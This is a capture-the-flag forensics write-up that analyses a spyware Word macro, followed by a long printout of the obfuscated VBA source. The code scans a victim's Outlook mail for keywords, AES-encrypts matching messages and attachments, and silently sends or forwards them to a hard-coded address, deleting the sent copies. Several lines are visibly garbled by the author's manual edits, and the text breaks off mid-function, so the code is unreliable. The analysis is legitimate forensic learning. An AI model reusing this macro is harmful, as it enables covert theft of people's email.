OLE - Dirty Laundry [Forensics]
Introduction
Challenge Description:
We managed to retrieve a sample of the spyware and suspicious mail that seems to be produced by the spyware. Can you analyze the provided files 'mail.txt' and 'invisible_shields.docm', and find out what happened?This is from mail.txt:
From: Austin <taustin@whschool.com>
To: dph@whschool.com
Subject: Outlook Exfiltration Data from User: taustin
*twGsy*#p7XY8CT4N3RpGq5xDzL7EMHW|MZgInjVQiig/Ce4mInU3xVamChLH3kT4ME1JJ9YEHJuCFLa1Zfg+I5d2h5j1QkGwNj237XLiaBtzkualk2WiJg==And indeed we have a file called invisible_shields.docm:
Now a tip from me, an amateur maldoc creator and maldoc analyst is that whenever you have a file with the .docm extension, the "m" in that extension means a macro-enabled document. Macros contain VBA scripts, which is short for Visual Basic for Applications, a programming language that allows users to automate tasks and create personalised solutions within Microsoft Excel or Word. However, modern document viewers will have macros disabled by default.
Stage 1 Analysis
Now when you have a macro-enabled file, it's best to use olevba to extract and analyse the potentially malicious file. You can download it through here or if you are using git, you can use the following command:
sudo pip3 install oletoolsAlso, when using olevba, it's best to add the --deobf and --decode switches to deobfuscate and decode if there are any obfuscated or encoded strings within the VBA. As you can see here, the extracted VBA is shown:
As shown in the image above, the obfuscation that is mainly used here is the XOR function which is Xor in VBA syntax. So, what I did is to replace every Xor statement with ^ to make it simpler for me to deobfuscate with Python. You can consider this as Stage 1 for deobfuscating the VBA script, this makes it easier to deobfuscate the script in Stage 2. Yes, I did it manually, for every. single. instance.
Const exfil_address As String = "dph@whschool.com"
Private SiTdrVDFDh As Boolean
Private lxtmwrylodux((0 + (0 ^ 0)) To ((5 ^ 10) + (11 ^ 59))) As Byte
Private djMloUrgDXwtHC((0 ^ 0) To ((9 ^ 7) + 113)) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
Dim atBjGMlxGDau As Variant
Dim IsNslKdUSos As Long
Dim ULDvZWynDzG As String
atBjGMlxGDau = Array(nkalPYSrDkoirG(Array(((1 ^ 3) + 15)), ((0 ^ 7) + (5 ^ 12))), nkalPYSrDkoirG(Array(150), ((4 ^ 13) + (2 ^ 10))), nkalPYSrDkoirG(Array(25), ((2 ^ 0) + 16)), nkalPYSrDkoirG(Array((166 + (33 ^ 101))), (11 ^ 24)), nkalPYSrDkoirG(Array(63), (19 ^ 7)), nkalPYSrDkoirG(Array(((25 ^ 218) + 5)), (18 ^ 7)), nkalPYSrDkoirG(Array((87 + 136)), ((11 ^ 4) + 7)), nkalPYSrDkoirG(Array(((39 ^ 12) + 7)), ((18 ^ 1) + (1 ^ 5))), nkalPYSrDkoirG(Array((73 + 22)), (8 ^ 16)), _
nkalPYSrDkoirG(Array((11 + 55)), 25), _
nkalPYSrDkoirG(Array(((23 ^ 95) + 140)), (15 + (8 ^ 3))), nkalPYSrDkoirG(Array((51 ^ 121)), (11 ^ 16)), nkalPYSrDkoirG(Array(((17 ^ 32) + (32 ^ 20))), 28), nkalPYSrDkoirG(Array((13 ^ 24)), 29), nkalPYSrDkoirG(Array((41 + 0)), ((2 ^ 14) + 18)), nkalPYSrDkoirG(Array(221), ((5 ^ 15) + (21 ^ 0))), nkalPYSrDkoirG(Array(((36 ^ 165) + (1 ^ 13))), 32), nkalPYSrDkoirG(Array((155 + (68 ^ 17))), 33), nkalPYSrDkoirG(Array((110 + 26)), ((3 ^ 16) + 15)), nkalPYSrDkoirG(Array((35 + (59 ^ 65))), 35), _
nkalPYSrDkoirG(Array((225 ^ 30)), (4 ^ 32)), nkalPYSrDkoirG(Array(((8 ^ 78) + 103)), ((10 ^ 0) + 27)), nkalPYSrDkoirG(Array((50 ^ 185)), (28 ^ 58)), nkalPYSrDkoirG(Array((31 ^ 103)), ((6 ^ 17) + (1 ^ 17))), _
nkalPYSrDkoirG(Array(((1 ^ 0) + (2 ^ 0))), (40 + (0 ^ 0))), nkalPYSrDkoirG(Array(((23 ^ 48) + 125)), (41 + (0 ^ 0))), nkalPYSrDkoirG(Array(((4 ^ 2) + 12)), (20 + 22)), nkalPYSrDkoirG(Array(((30 ^ 34) + (10 ^ 159))), (15 + 28)), nkalPYSrDkoirG(Array(((36 ^ 31) + (37 ^ 95))), 44), nkalPYSrDkoirG(Array((62 + 0)), 45), nkalPYSrDkoirG(Array(129), (19 + 27)), nkalPYSrDkoirG(Array(((12 ^ 53) + 155)), (12 + 35)), nkalPYSrDkoirG(Array(((7 ^ 10) + (9 ^ 7))), 48), nkalPYSrDkoirG(Array(((115 ^ 205) + (25 ^ 53))), _
(41 ^ 24)), nkalPYSrDkoirG(Array((100 ^ 29)), (16 ^ 34)), nkalPYSrDkoirG(Array(173), 51), nkalPYSrDkoirG(Array((20 + 130)), (26 + (22 ^ 12))), nkalPYSrDkoirG(Array(94), 53), _
nkalPYSrDkoirG(Array(73), 54), nkalPYSrDkoirG(Array(((15 ^ 23) + (32 ^ 16))), 55), nkalPYSrDkoirG(Array((60 + 69)), 56), nkalPYSrDkoirG(Array((199 + (3 ^ 13))), ((0 ^ 2) + (1 ^ 54))), nkalPYSrDkoirG(Array(29), 58), nkalPYSrDkoirG(Array(((14 ^ 31) + (2 ^ 7))), ((55 ^ 14) + (1 ^ 3))), nkalPYSrDkoirG(Array(((43 ^ 26) + 41)), 60), nkalPYSrDkoirG(Array((8 + (2 ^ 5))), (49 + (1 ^ 13))), nkalPYSrDkoirG(Array(192), ((1 ^ 18) + (29 ^ 54))), nkalPYSrDkoirG(Array(138), (41 + (14 ^ 24))), _
nkalPYSrDkoirG(Array((138 ^ 76)), 64), nkalPYSrDkoirG(Array(((90 ^ 51) + (49 ^ 103))), 65), nkalPYSrDkoirG(Array(((1 ^ 0) + 41)), (14 + 52)), nkalPYSrDkoirG(Array(((41 ^ 22) + 146)), 67), _
nkalPYSrDkoirG(Array((110 ^ 147)), 68), nkalPYSrDkoirG(Array(((56 ^ 103) + 24)), 69), nkalPYSrDkoirG(Array(45), (36 + (29 ^ 63))), nkalPYSrDkoirG(Array(((0 ^ 2) + (22 ^ 48))), 71), nkalPYSrDkoirG(Array(98), ((0 ^ 19) + (45 ^ 24))), nkalPYSrDkoirG(Array(((66 ^ 15) + (48 ^ 6))), (17 ^ 88)), nkalPYSrDkoirG(Array((9 ^ 84)), (48 + (4 ^ 30))), nkalPYSrDkoirG(Array((129 + (17 ^ 14))), (5 ^ 78)), nkalPYSrDkoirG(Array((32 ^ 182)), ((4 ^ 26) + 46)), nkalPYSrDkoirG(Array((76 ^ 254)), _
(25 + (51 ^ 7))), nkalPYSrDkoirG(Array((67 ^ 221)), (43 ^ 101)), nkalPYSrDkoirG(Array((14 + 184)), 79), nkalPYSrDkoirG(Array((98 ^ 147)), ((28 ^ 2) + 50)), nkalPYSrDkoirG(Array((14 + 12)), 81), _
nkalPYSrDkoirG(Array(82), (16 ^ 66)), nkalPYSrDkoirG(Array((119 + 123)), 83), nkalPYSrDkoirG(Array((7 ^ 13)), (35 + 49)), nkalPYSrDkoirG(Array(32), 85))
For IsNslKdUSos = ((0 ^ 1) + (0 ^ 0)) To JulhxRTJAtZ
Randomize
ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
Next IsNslKdUSos
FVaFfsygaGuUBB = ULDvZWynDzG
End Function
Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
MTDPxqUeBtnHy = QvXdgzREtgivJc
If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function
Function ahSFGkugmp(NfZjOnhlizlg)
Dim BPFDRGiTpeffVc As String
Dim IxqNKATnfrjL() As Byte
Dim PIBNxhGCNMURDD As Object
Dim MyKtJzYAsXy As Object
Dim xothlNMzDN, JulhxRTJAtZ, QrbstMncnU As Integer
Set PIBNxhGCNMURDD = CreateObject(nkalPYSrDkoirG(Array((25 + 40), (0 ^ 15), (117 + 52), (22 ^ 69), (146 ^ 40)), (40 + (43 ^ 5))) & nkalPYSrDkoirG(Array(160, ((4 ^ 0) + (46 ^ 77)), ((26 ^ 42) + 80), (5 ^ 13), 139, ((25 ^ 93) + (12 ^ 17)), 250, 79, (33 + (35 ^ 29)), (193 + (25 ^ 6)), 170, (3 + 93), (174 ^ 91), ((31 ^ 88) + (0 ^ 0)), 103, (148 ^ 46), ((10 ^ 16) + (2 ^ 16)), 103, (99 + (6 ^ 61)), (17 ^ 14), ((61 ^ 105) + (70 ^ 210)), ((21 ^ 70) + (34 ^ 12)), 82, (170 + (7 ^ 15)), 18, 133, (62 ^ 77), _
((172 ^ 29) + 17), ((57 ^ 127) + (106 ^ 16)), (45 ^ 111), (137 ^ 62), (30 + (3 ^ 5)), (128 + 54), (20 + (18 ^ 0)), (134 + 103), (70 + 112), ((2 ^ 69) + 125), ((2 ^ 12) + 150), (180 + 57), (209 + (4 ^ 1)), 214), ((19 ^ 0) + 72)))
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array((68 + 14), (3 + (1 ^ 11)), (32 ^ 80), (25 + (0 ^ 2)), ((36 ^ 3) + (51 ^ 117)), 196, 165, (171 + (1 ^ 26)), (62 + (73 ^ 217)), (82 + 34), ((54 ^ 10) + (6 ^ 34)), ((13 ^ 23) + 48), 41, (161 + (22 ^ 64)), 250), (117 ^ 241)) & nkalPYSrDkoirG(Array(9, (102 + (34 ^ 96)), ((26 ^ 0) + (3 ^ 117)), (102 ^ 237), (21 ^ 190), 93, ((109 ^ 249) + 86), (98 ^ 249), ((4 ^ 145) + (12 ^ 20))), (139 + (7 ^ 15))))
QrbstMncnU = PIBNxhGCNMURDD.InputBlockSize
For xothlNMzDN = ((0 ^ 0) + 0) To LenB(NfZjOnhlizlg) - (0 ^ 1) Step QrbstMncnU
JulhxRTJAtZ = MTDPxqUeBtnHy(QrbstMncnU, UBound(NfZjOnhlizlg) - xothlNMzDN)
IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
BPFDRGiTpeffVc = BPFDRGiTpeffVc & MyKtJzYAsXy.GetString((IxqNKATnfrjL))
Next
ahSFGkugmp = BPFDRGiTpeffVc
End Function
Function uEfmNHGlYFaj(qcGjVkReTg)
Dim MyKtJzYAsXy As Object
Dim NfZjOnhlizlg() As Byte
Dim ScMpMxoqdQ As Object
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array(((2 ^ 35) + 153), 199, (101 + (104 ^ 224)), (74 + 99), 11), ((17 ^ 39) + 102)) & nkalPYSrDkoirG(Array(((27 ^ 63) + (3 ^ 5)), ((11 ^ 7) + 135), (26 + 218), (51 ^ 208), ((83 ^ 51) + (35 ^ 90)), (12 ^ 24), (120 ^ 136), 189, ((55 ^ 98) + (64 ^ 20)), 218, 150, (35 + 183), 26, (104 ^ 16), (14 ^ 16), ((33 ^ 171) + 109), ((10 ^ 117) + (51 ^ 92)), (13 ^ 42), ((9 ^ 3) + 93)), (0 + (124 ^ 221))))
Set ScMpMxoqdQ = CreateObject(nkalPYSrDkoirG(Array(((12 ^ 19) + (2 ^ 8)), (1 ^ 17), (35 ^ 224), 43, ((5 ^ 13) + (26 ^ 52)), (194 ^ 33), ((128 ^ 43) + (0 ^ 0)), (26 + (8 ^ 28)), ((5 ^ 8) + 32), (3 ^ 8), ((0 ^ 6) + 108), (211 ^ 43), (10 + 8), (4 + (86 ^ 231)), ((102 ^ 244) + (53 ^ 101)), (14 ^ 38), (70 ^ 41), 219, (9 + 121), ((83 ^ 216) + (7 ^ 21)), 226, ((6 ^ 24) + (3 ^ 7)), (111 + 95), 1, (17 + 23), (77 + 64), ((2 ^ 4) + (0 ^ 1)), (91 + (4 ^ 28)), ((75 ^ 255) + 34), 206, (131 + (14 ^ 26)), _
((20 ^ 100) + (24 ^ 72)), (9 + 197), 49, 69), ((1 ^ 4) + 175)) & nkalPYSrDkoirG(Array(((1 ^ 3) + (1 ^ 0)), (133 ^ 59), ((9 ^ 36) + (1 ^ 102)), ((70 ^ 192) + (56 ^ 122)), (18 ^ 74), 140, 195, 140, 153, (77 + (44 ^ 79)), (65 ^ 215), ((18 ^ 6) + 221), 144), (213 ^ 2)))
NfZjOnhlizlg = MyKtJzYAsXy.GetBytes_4(qcGjVkReTg)
uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function
Function ydcyecOpBU(dGArFkUqGLilS)
Dim NdOBkdEXtS, wotFUFrkOjPBgY, zGRVIukttQSSEv, qdjbSxTRAtUT() As Byte
Dim BFSsfIzKNm As String
BFSsfIzKNm = FVaFfsygaGuUBB(32)
Dim MyKtJzYAsXy, igFwXpLeArakc, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
Dim kSNpGaWBeFRbpl() As Byte
Set igFwXpLeArakc = CreateObject(nkalPYSrDkoirG(Array((114 ^ 242), (25 ^ 4), ((1 ^ 7) + 100), ((4 ^ 2) + 25), 232, (21 + 153), (67 + 6), (188 ^ 79), (83 + 8), ((7 ^ 8) + 5), (132 + (22 ^ 57)), 19), ((91 ^ 244) + (52 ^ 1))) & nkalPYSrDkoirG(Array(((13 ^ 126) + 23), (11 + (0 ^ 0)), (21 + (25 ^ 123)), (50 + (14 ^ 84)), ((21 ^ 43) + (4 ^ 1)), (89 + 19), 195, ((27 ^ 55) + 100), ((1 ^ 7) + (11 ^ 35)), 90, (6 + 12), 82, 93, (27 ^ 35), 103, (11 + (8 ^ 56)), (126 + 60), (58 ^ 114), (9 + (1 ^ 14)), (133 + (34 ^ 98)), 227, _
(2 ^ 106), (10 + 12), (61 + 16), (46 + (55 ^ 99)), 139, (40 + (37 ^ 99)), 160, (3 ^ 0), ((54 ^ 121) + (5 ^ 21)), (79 + 33), (2 ^ 219)), (215 ^ 39)))
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array((1 ^ 5), 92, ((42 ^ 1) + 17), (25 ^ 63), (26 ^ 52), (45 ^ 28), 104, ((10 ^ 25) + 132), 61, (81 ^ 61), 167, 130, (40 ^ 1), 233, (138 ^ 81), ((21 ^ 45) + (70 ^ 22)), 175, (37 + 92), 75, (74 + 123), 16, (8 ^ 108)), ((69 ^ 37) + 176)) & nkalPYSrDkoirG(Array(((80 ^ 219) + (3 ^ 5)), (46 ^ 85)), ((86 ^ 37) + 179)))
igFwXpLeArakc.KeySize = 256
igFwXpLeArakc.QrbstMncnU = 256
igFwXpLeArakc.Mode = (1 + 0)
igFwXpLeArakc.Key = CreateObject(
nkalPYSrDkoirG(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296)
nkalPYSrDkoirG(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(nkalPYSrDkoirG(Array((27 ^ 96), (69 ^ 194), 173, (126 + 125), 121, (59 ^ 163), (34 ^ 135), ((35 ^ 6) + 94), 51, ((12 ^ 0) + (87 ^ 9)), (17 + (2 ^ 4)), 231, (20 + (21 ^ 8)), ((0 ^ 3) + 110), 196, (169 + 19), 30, 231, (66 + (7 ^ 106)), (210 ^ 51), (97 + 17), (142 + (5 ^ 26)), (9 + (98 ^ 167)), 191, 220, (31 ^ 205), ((42 ^ 91) + 120), (94 + 0), 135), (51 ^ 371))
kalPYSrDkoirG(Array((37 ^ 176), ((6 ^ 47) + 190), 36), ((161 ^ 123) + (40 ^ 171))))
igFwXpLeArakc.BFSsfIzKNm = CreateObject(nkalPYSrDkoirG(Array((60 ^ 107), (128 + 45), (72 + 14), ((10 ^ 0) + (137 ^ 70)), (25 + (3 ^ 15)), 115, ((15 ^ 30) + (19 ^ 34)), (0 ^ 233), (161 ^ 10), (187 ^ 0), 26), ((310 ^ 124) + (19 ^ 5))) & nkalPYSrDkoirG(Array(((31 ^ 47) + 26), (51 + 123), 187, ((11 ^ 17) + (46 ^ 67)), (99 + 33), (24 ^ 91), (51 ^ 171), (17 + (31 ^ 45)), (15 ^ 149), ((9 ^ 27) + (1 ^ 3)), (18 + 6), (2 ^ 37), 73), (102 ^ 269))).GetBytes_4(BFSsfIzKNm)
qdjbSxTRAtUT = CreateObject(nkalPYSrDkoirG(Array(((14 ^ 30) + 17), (153 ^ 62), (194 + (2 ^ 37)), 97, ((46 ^ 26) + (41 ^ 157)), 150, (102 ^ 227), (107 ^ 243), ((4 ^ 1) + (136 ^ 55)), ((20 ^ 12) + (34 ^ 122)), (228 + 22), 209, (24 + 40), (36 + 56), 38, 253, (75 + (3 ^ 135)), (87 + (14 ^ 46))), (58 ^ 322)) & nkalPYSrDkoirG(Array((15 ^ 101), ((42 ^ 18) + (26 ^ 59)), (5 ^ 110), ((90 ^ 203) + 21), (123 ^ 132), 238), ((8 ^ 2) + 384))).GetBytes_4(dGArFkUqGLilS)
NdOBkdEXtS = igFwXpLeArakc.CreateEncryptor().TransformFinalBlock((qdjbSxTRAtUT), (0 + (0 ^ 0)), UBound(qdjbSxTRAtUT))
ydcyecOpBU = BFSsfIzKNm & nkalPYSrDkoirG(Array((80 ^ 7)), 400) & ahSFGkugmp(NdOBkdEXtS)
End Function
Sub jexCsPbeKyQ()
Dim whDjrLULSB
whDjrLULSB = Array( _
nkalPYSrDkoirG(Array(((11 ^ 95) + (15 ^ 50)), ((9 ^ 195) + 45), 232, 39, ((32 ^ 4) + (12 ^ 156)), (1 ^ 3), (8 ^ 7)), (210 + (161 ^ 30))) & nkalPYSrDkoirG(Array(((2 ^ 40) + (63 ^ 105))), (163 + (235 ^ 30))), _
nkalPYSrDkoirG(Array((36 ^ 25), (47 ^ 144), (48 ^ 175), ((36 ^ 19) + (66 ^ 228)), 67, 62), 409), _
nkalPYSrDkoirG(Array(((4 ^ 15) + (4 ^ 15)), ((81 ^ 8) + (56 ^ 94)), (64 + (8 ^ 0)), 72, (174 ^ 93)), (318 + (48 ^ 81))), _
nkalPYSrDkoirG(Array(81, (89 ^ 222), (72 ^ 147), 250, (0 ^ 98), (9 + 126), ((135 ^ 31) + (0 ^ 74)), ((88 ^ 33) + (79 ^ 18)), (47 + 3)), ((105 ^ 260) + 55)) & nkalPYSrDkoirG(Array(183), (122 ^ 471)), _
nkalPYSrDkoirG(Array(((14 ^ 0) + 17), (0 + 0), 15, ((3 ^ 205) + (24 ^ 41)), (69 + (0 ^ 31))), (330 + (73 ^ 45))) & nkalPYSrDkoirG(Array((57 + (0 ^ 158)), (19 ^ 251), (70 ^ 22), 157, (148 ^ 37), (158 + (83 ^ 8))), ((78 ^ 44) + 337)), _
nkalPYSrDkoirG(Array((84 ^ 244), ((7 ^ 20) + (6 ^ 27)), (189 + (39 ^ 17)), 84, (62 + (44 ^ 20)), 78), (273 ^ 168)) & nkalPYSrDkoirG(Array((74 + 71), ((0 ^ 4) + 32), (118 ^ 185), (33 ^ 213)), 447), _
nkalPYSrDkoirG(Array(114, ((54 ^ 100) + 173), ((20 ^ 122) + (24 ^ 1)), ((0 ^ 0) + 236), 183), 451) & nkalPYSrDkoirG(Array(((17 ^ 7) + (32 ^ 26)), (60 + 21), 233, ((48 ^ 105) + 29), ((41 ^ 108) + (50 ^ 191)), (82 ^ 219), (14 + 233), (4 ^ 13), (0 ^ 3), ((98 ^ 255) + (16 ^ 33)), ((59 ^ 70) + 80), ((11 ^ 23) + (2 ^ 10)), 145, ((0 ^ 0) + (9 ^ 27)), (43 + (5 ^ 40)), 178, ((32 ^ 105) + (6 ^ 9))), (71 + (120 ^ 505))) _
)
Dim RQRaVHWlfs
RQRaVHWlfs = Array( _
nkalPYSrDkoirG(Array(((10 ^ 0) + 26), (14 + (50 ^ 149)), ((73 ^ 4) + (28 ^ 57))), ((153 ^ 115) + (150 ^ 110))), _
nkalPYSrDkoirG(Array(((140 ^ 18) + 86), ((4 ^ 29) + 106), (25 ^ 59)), (389 + (29 ^ 125))), _
nkalPYSrDkoirG(Array((33 + 101), ((0 ^ 14) + 8), (35 + 9)), (242 ^ 282)), _
nkalPYSrDkoirG(Array((199 + 14), 155, ((164 ^ 10) + 36)), 491), _
nkalPYSrDkoirG(Array((72 ^ 181), (134 + 20), 166), (220 + 274)), _
nkalPYSrDkoirG(Array(((5 ^ 25) + 32), 249), ((235 ^ 501) + 211)) & nkalPYSrDkoirG(Array(((27 ^ 57) + 58), 111, 53, ((0 ^ 0) + (0 ^ 0)), (12 ^ 2)), (4 + 495)), _
nkalPYSrDkoirG(Array((7 + (32 ^ 155)), ((0 ^ 0) + (2 ^ 34)), 13), ((3 ^ 416) + (8 ^ 93))), _
nkalPYSrDkoirG(Array(((0 ^ 0) + 123), ((13 ^ 16) + (0 ^ 0)), (209 + 10)), 507), _
nkalPYSrDkoirG(Array((8 ^ 97), ((19 ^ 96) + (0 ^ 60)), 240), ((117 ^ 431) + (28 ^ 56))), _
nkalPYSrDkoirG(Array(((37 ^ 13) + (69 ^ 194)), (136 ^ 49), (79 + (23 ^ 33)), ((13 ^ 28) + (0 ^ 7))), ((96 ^ 19) + (324 ^ 202))), _
nkalPYSrDkoirG(Array((13 ^ 134), 22, (145 + 25), 55), 517), _
nkalPYSrDkoirG(Array(((45 ^ 16) + (0 ^ 2)), 233, (60 ^ 92), (61 ^ 119)), 521), _
nkalPYSrDkoirG(Array(13, 180, (77 ^ 233)), (261 ^ 776)), _
nkalPYSrDkoirG(Array(118, (42 ^ 27), ((10 ^ 19) + 23)), 528), _
nkalPYSrDkoirG(Array((4 ^ 27), ((21 ^ 84) + (16 ^ 5)), (40 + 0), (18 ^ 51)), (65 + 466)), _
nkalPYSrDkoirG(Array((215 + 10), 47, (2 + (0 ^ 157)), (24 ^ 6)), 535), _
nkalPYSrDkoirG(Array((37 + 5), ((4 ^ 1) + (129 ^ 10)), (5 + (0 ^ 6))), (35 + 504)), _
nkalPYSrDkoirG(Array(((29 ^ 60) + 14), (14 ^ 56), (9 ^ 182)), (177 + 365)), _
nkalPYSrDkoirG(Array((169 + (24 ^ 46)), ((33 ^ 108) + 103), 184), (29 + 516)), _
nkalPYSrDkoirG(Array((174 ^ 23), (32 + (1 ^ 3))), (121 ^ 605)), _
nkalPYSrDkoirG(Array((132 + (1 ^ 11)), (87 + (9 ^ 103)), (82 ^ 202)), (398 + 152)), _
nkalPYSrDkoirG(Array(244, (137 ^ 107), 208), ((120 ^ 480) + 145)) _
)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Dim xfjOpXLsBTY As Object
Dim FCMymRIsfbrg As Object
Set PtXoKYFkpFJGSc = CreateObject(nkalPYSrDkoirG(Array(32, ((0 ^ 3) + (87 ^ 45)), ((1 ^ 4) + 140), (55 + (10 ^ 26)), (30 + 55), (21 ^ 234), (150 + (7 ^ 56)), 53, (127 + (100 ^ 23)), (12 + (37 ^ 166))), (318 + 238)) & nkalPYSrDkoirG(Array((95 + (2 ^ 102)), 175, 156, (45 ^ 19), ((11 ^ 4) + 1), (2 + 207), (6 ^ 132), (51 ^ 172), (105 + 127)), ((166 ^ 79) + 333)))
Set xfjOpXLsBTY = PtXoKYFkpFJGSc.GetNamespace(nkalPYSrDkoirG(Array(((4 ^ 15) + 20), ((16 ^ 2) + 24), (196 ^ 14), (14 ^ 171)), 575))
Set FCMymRIsfbrg = xfjOpXLsBTY.GetDefaultFolder((3 + (2 ^ 1))).Items
Dim KLMydQnxMZSOX As Integer
Dim JxQPJFEkRSPeB As Boolean
JxQPJFEkRSPeB = False
Dim jUBrimEvzM As Boolean
jUBrimEvzM = False
Dim qeFHkrcXQwLmue As Date
Dim kcINMJtMyDQgLL As Date
Const daysToSearch As Integer = (357 ^ 245)
qeFHkrcXQwLmue = Date - daysToSearch
kcINMJtMyDQgLL = Date
Dim QmmdKXwuMa As Object
For Each QmmdKXwuMa In FCMymRIsfbrg
If QmmdKXwuMa.ReceivedTime >= qeFHkrcXQwLmue And QmmdKXwuMa.ReceivedTime <= kcINMJtMyDQgLL Then
JxQPJFEkRSPeB = haPxSQQXjz(QmmdKXwuMa.body, QmmdKXwuMa.Subject, whDjrLULSB)
If JxQPJFEkRSPeB Then
Call ScsSqzpSPu(QmmdKXwuMa.body, QmmdKXwuMa.Subject)
End If
If QmmdKXwuMa.Attachments.Count > ((0 ^ 0) + 0) Then
Dim xZLUISSiXEpR As Integer
For xZLUISSiXEpR = 1 To QmmdKXwuMa.Attachments.Count
jUBrimEvzM = mvieYItXUPBIvj(QmmdKXwuMa.Attachments.Item(xZLUISSiXEpR), RQRaVHWlfs, whDjrLULSB)
If jUBrimEvzM Then
Call RkrRzFVxFXd(QmmdKXwuMa, QmmdKXwuMa.Subject)
End If
Next
End If
End If
Next
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub ScsSqzpSPu(IehgfWzjBPM As String, gjQiIlwvaI As String)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Set PtXoKYFkpFJGSc = CreateObject(nkalPYSrDkoirG(Array(214, (46 + (45 ^ 2)), ((31 ^ 92) + (34 ^ 0)), (29 + (15 ^ 69)), (197 ^ 37), (161 ^ 104), (68 + 3), ((31 ^ 86) + (5 ^ 8)), (7 + (0 ^ 7))), ((24 ^ 248) + 355)) & nkalPYSrDkoirG(Array(56, (28 ^ 120), (3 ^ 182), (76 ^ 29), (77 + 12), ((20 ^ 12) + 57), ((34 ^ 83) + 135), ((1 ^ 2) + 23), (145 ^ 55), ((72 ^ 2) + (7 ^ 10))), (468 ^ 920)))
Set XstsppFkvZr = PtXoKYFkpFJGSc.CreateItem(0)
emDROsRKEd = IehgfWzjBPM
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), 614)
.BCC = nkalPYSrDkoirG(Array(), (156 ^ 762))
.Subject = nkalPYSrDkoirG(Array(145, 63, (49 ^ 192), ((1 ^ 23) + 18), (66 ^ 13), (8 ^ 3), ((199 ^ 15) + (0 ^ 6)), (4 + (62 ^ 121)), (30 + (105 ^ 196)), 110, (96 ^ 3), (112 + 7), (81 ^ 204), (94 ^ 241), 96, 33, 112, 243, ((29 ^ 58) + 151), (96 ^ 194), ((1 ^ 0) + 11), 14, (24 ^ 43), ((45 ^ 105) + 55), ((30 ^ 59) + 165), 234, 175, (2 + 29), 235, 200, (17 + 178), 224, 147, 11), (366 + 248)) & nkalPYSrDkoirG(Array((38 + 63), (85 ^ 189), 121), (417 + 231)) & Environ(nkalPYSrDkoirG(Array(19, 248), _
((260 ^ 8) + (133 ^ 506))) & nkalPYSrDkoirG(Array(((0 ^ 145) + (2 ^ 26)), 114, ((21 ^ 32) + (17 ^ 14)), ((26 ^ 58) + 60), 212, ((15 ^ 21) + 86)), ((273 ^ 67) + 315)))
.body = ydcyecOpBU(gjQiIlwvaI & emDROsRKEd)
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub RkrRzFVxFXd(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
Dim XstsppFkvZr As Object
Set XstsppFkvZr = QmmdKXwuMa.Forward
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), ((269 ^ 911) + 33))
.BCC = nkalPYSrDkoirG(Array(), 675)
.Subject = nkalPYSrDkoirG(Array((87 ^ 40), (218 + (0 ^ 2)), (19 + 12), ((4 ^ 11) + 135), (35 ^ 240), ((72 ^ 56) + 19), (66 ^ 5), ((4 ^ 25) + 14), 170, ((5 ^ 97) + (54 ^ 190)), 164, 166, ((89 ^ 62) + 9), (13 ^ 28), 25, (109 + (7 ^ 10)), 182, ((0 ^ 0) + 170), (122 ^ 181), (2 + (6 ^ 20)), (99 ^ 152), (16 ^ 0), ((29 ^ 85) + (22 ^ 54)), ((9 ^ 0) + 21), (156 + (81 ^ 0)), (58 ^ 160), 60, ((6 ^ 44) + (84 ^ 210)), 203, ((16 ^ 0) + (12 ^ 28)), (164 ^ 118), (159 + 19), (21 + (32 ^ 164)), (136 + 4), 89, _
((0 ^ 12) + (24 ^ 1)), (42 + 58), ((56 ^ 104) + 164), ((1 ^ 3) + (2 ^ 220))), 675) & nkalPYSrDkoirG(Array((14 ^ 119), (34 ^ 189), 195, ((0 ^ 8) + 247)), 714) & Environ(nkalPYSrDkoirG(Array(((8 ^ 84) + 30), (16 ^ 100), 80, 109, (75 ^ 192), (121 ^ 211), (1 + (4 ^ 25))), 718) & nkalPYSrDkoirG(Array((103 ^ 245)), ((100 ^ 601) + 152)))
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
End Sub
Public Function haPxSQQXjz(IehgfWzjBPM As String, gjQiIlwvaI As String, whDjrLULSB As Variant) As Boolean
haPxSQQXjz = False
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Then
haPxSQQXjz = True
Exit For
Else
haPxSQQXjz = False
End If
Next
End Function
Public Function mvieYItXUPBIvj(OFTngrKtymtIs As Variant, RQRaVHWlfs As Variant, whDjrLULSB As Variant) As Boolean
mvieYItXUPBIvj = False
Dim sBtphCWmicZ As Boolean
sBtphCWmicZ = False
Dim FSvAGmBKEpy As Boolean
FSvAGmBKEpy = False
Dim KfBAtqXWVPbl As String
Dim tFWjedYCFp As String
